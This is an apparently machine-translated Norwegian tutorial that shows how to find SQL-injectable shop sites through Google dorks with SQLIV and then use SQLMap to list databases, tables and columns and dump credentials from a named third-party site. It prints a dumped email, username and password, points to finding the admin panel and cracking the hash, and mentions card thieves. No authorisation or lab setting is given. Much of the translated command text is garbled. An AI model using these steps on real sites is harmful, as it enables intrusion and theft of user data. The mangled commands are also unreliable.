SQL -injeksjon med Kali Linux

SQL -injeksjon med Kali Linux
Bruken av databaser for forskjellige datalagringsadministrasjon øker i stor grad i utvikling av nettappen etter hvert som tiden går. Database letter samspillet mellom brukere og servere. Databasen (eller når det gjelder databasestyringssystem forkortet til DMBS) gir forskjellige fordeler, inkludert datainngang og lagring, henting av stor informasjon og enkel kompilering og grupperingsinformasjon.

Men ved siden av lettheten og funksjonene som databasen tilbyr, så vel som de mange bruksområdene til databaser i verden av informasjon og teknologi, spesielt i utviklingen av et nettsted. Uavhørende pentestere og hackere prøver å finne et gap i databasens sikkerhet. Dette bekreftes av rapporten utstedt av Positive Technologies-forskere, informasjonssikkerhetsforskningssentre i Europa, i andre kvartal 2017 ble de 10 beste angrepene på webapplikasjonen dominert av krysset på tvers av nettsteder på 39.1% og SQL -injeksjon av 24.9%. Positive Technologies sa at rapporten i andre kvartal ikke er mye forskjellig fra første kvartal.

Figur 1. Topp 10 webapplikasjonsangrep (Source PTSecurity.com)

Dette er både interessant og bekymringsfullt, for i en database er det mye informasjon som legitimasjonskontoer (admin og bruker), informasjonsdetaljer for økonomisk informasjon (for eksempel kredittkort, bankkontoer osv.) og så videre. For å gjøre SQL -injeksjonsangrep krever ikke alltid ekspertinjeksjonsevner, i den forstand kan barna gjøre det. Fordi det er mange gratis applikasjoner som er i stand til å utføre SQL -injeksjon automatisk, for eksempel SQLMap. SQLMap er en åpen kildekode -applikasjon for penetrasjonstestingsaktiviteter som tar sikte på å utføre SQL -injeksjonsangrep i et databasesikkerhetshull automatisk. Her vil jeg vise deg hvordan du gjør SQL -injeksjon ved hjelp av SQLMap i Linux Kali. Ingen spesielle muligheter er nødvendige, men vil være mer verdt hvis du mestrer et skriptspråk eller SQL -databaseteknologi.

Denne opplæringen anbefales for de som er nye i SQL -injeksjon i Kali Linux, bare for moro skyld, eller som vil se hvordan SQL -injeksjon fungerer. Det anbefales ikke at de allerede er dyktige penetrasjonstestere.


Hei, jeg er Bimando, forfatteren av denne artikkelen. Hvis du liker denne artikkelen, kan du se på å kjøpe boken min PRAKTISK ETISK HACKING: For penetrasjonstestere med Kali Linux. Jeg jobbet hardt med det med Linux -hint -teamet for å produsere et produkt av høy kvalitet. Jeg vet at du vil elske det og lære mye.


SQL -injeksjon ved hjelp av SQLMap i Kali Linux

Før vi gjør injeksjonsangrepet, må vi selvfølgelig sørge for at serveren eller målet har et databasesikkerhetshull. For å finne databasesikkerhetshull, er det flere metoder vi kan bruke. Blant dem, Google Dorking, brukes mest av hacker og penetrasjonstestere. Heldigvis er det et verktøy som er i stand til å gjøre det automatisk. Men vi må installere verktøyet først. Verktøyet kalles SQLIV (SQL Injection Sårbarhetsskanner).

Trinn 1: Installer SQLIV på Kali Linux

Skriv kommandoer nedenfor i terminalen din for å installere SQLIV:

~# git klon https: // github.com/hadesy2k/sqliv.git
~# CD Sqliv && sudo python2 oppsett.py -i

Når SQLIV er installert i Kali Linux, lagres den i banen /usr/bin/sqliv. Som du kan ringe direkte fra terminalen, ved å skrive 'Sqliv'. La oss nå se på SQLIV -funksjoner.

Trinn 2: Finne SQL -injeksjonssårbarheter

Vi vil bruke Google Dorking for å skanne og finne SQL -injeksjonshullet i mål. La oss ta en enkel dork, og la SQLIV skanne gjennom hvert eneste mål og se etter et netthandel -sårbarhet ved følgende URL -mønster '.PHP?id = '. For å finne andre mønstre bare Google for “Google Dork List”.

~# sqliv -d inurl: vare.PHP?id = -e google -p 100

Som standard vil SQLIV krype første side på søkemotoren, som på Google 10 nettsteder per side. Dermed definerer vi argument -p 100 å krype 10 sider (100 nettsteder). Basert på dork gitt ovenfor fikk vi et resultat av sårbare nettadresser som ser slik ut:

Vi fant åtte av hundre nettadresser skannet og ansett som sårbare mot SQL -injeksjonsangrep. Lagre nettadressene i tekstredigerer for ytterligere trinn.

Trinn 3: SQL -injeksjon ved hjelp av SQLMap

Når vi fikk minst ett SQL -injeksjon sårbart mål, utfører vi deretter angrepet ved hjelp av SQLMap. Jeg tar en av dem for å være et utvalg her. For det første må vi avsløre databasenavnet, inne i databasen har tabeller og kolonner, som inneholder dataene.

Target URL: http: // www.Acfurniture.com/vare.PHP?ID = 25

EN. Oppregner databasenavn:

Kommandomønster:

~# SqlMap -u “Target URL” -DBS
-U / --URL: Target URL
--DBS: tellere database/s navn

Så kommandoen som er samlet ville se slik ut:

~# sqlmap -u “http: // www.Acfurniture.com/vare.PHP?Id = 25 ” -DBS

Fra kommandoen over, bør resultatet se slik ut

Vi fikk databasenavnet "Acfurniture”.

B. Oppregner tabeller navn

Kommandomønster:

~# SQLMAP -U “Target URL” -D Database -Name -Tables

Så kommandoen samlet være slik:

~# sqlmap -u "http: // www.Acfurniture.com/vare.PHP?id = 25 "-d acfurniture -bord

Resultatet skal se slik ut:

Så langt kan vi konkludere med at ordningen med data er, nettstedet Acfurniture.com har to databaser, Acfurniture og informasjon_schema. Databasen som heter Acfurniture inneholder fire bord: kategori, produkt, produkt_hakket, og Innstillinger. Det er ikke noe kompromittert bordnavn, men la oss undersøke mer. La se hva som er inni Innstillinger bord. Inne i tabellen er det faktisk kolonner, og dataene.

C. Oppregner kolonner

Kommandomønster:

~# SqlMap -u “Target URL” -D Database -Name -t Tabell -Name -Kolonner

Så kommandoen samlet være slik:

~# sqlmap -u "http: // www.Acfurniture.com/vare.PHP?id = 25 "-d acfurniture -t innstillinger -kolonner

Utgangen skal se slik ut:

De Innstillinger Tabellen består av 6 kolonner, Og dette er faktisk en legitimasjonskonto. La oss dumpe disse dataene.

D. Dumpe data

Kommandomønster:

~# SQLMAP -U “Target URL” -D Database -Name -T Tabell -Name -C Columns -Dump

Så kommandoen samlet være slik:

~# sqlmap -u "http: // www.Acfurniture.com/vare.PHP?id = 25 "-d acfurniture -t innstillinger -c brukernavn, passord -dump

Eller du kan også dumpe alle data inne i tabellen ved å bruke kommando:

~# sqlmap -u "http: // www.Acfurniture.com/vare.PHP?id = 25 "-d acfurniture -t innstillinger --dump

Utgangen skal se slik ut:

E -post : [email protected]
Brukernavn : Kjekk
Passord : 9hpko2nkrhbgmywzizxui

OK, vi er ferdig med å dumpe data i databasen ved hjelp av SQL -injeksjon. Våre neste oppgaver er å finne dør eller adminpanel, administratorpåloggingsside på målsider. Før du gjør det, må du sørge for at passordet (9HPKO2NKRHBGMYWZIZXUI) er kryptert eller ikke, i så fall, så må vi dekryptere det først. Det er et annet tema, sprekker og dekrypterende.

Selv her har vi faktisk ikke hacking inn på målstedet, i det minste har vi lært mye om SQL -injeksjon ved hjelp av SQLMap i Kali Linux enkelt, og vi dumper legitimasjonskontoen. Denne teknikken brukes mest av Carder (Hacker som leter etter kredittkortkonto på e-handelsnettsteder) som retter seg mot økonomiske, bank-, butikk- eller e-handelsnettsteder som lagrer brukerkredittkortinformasjonen sin.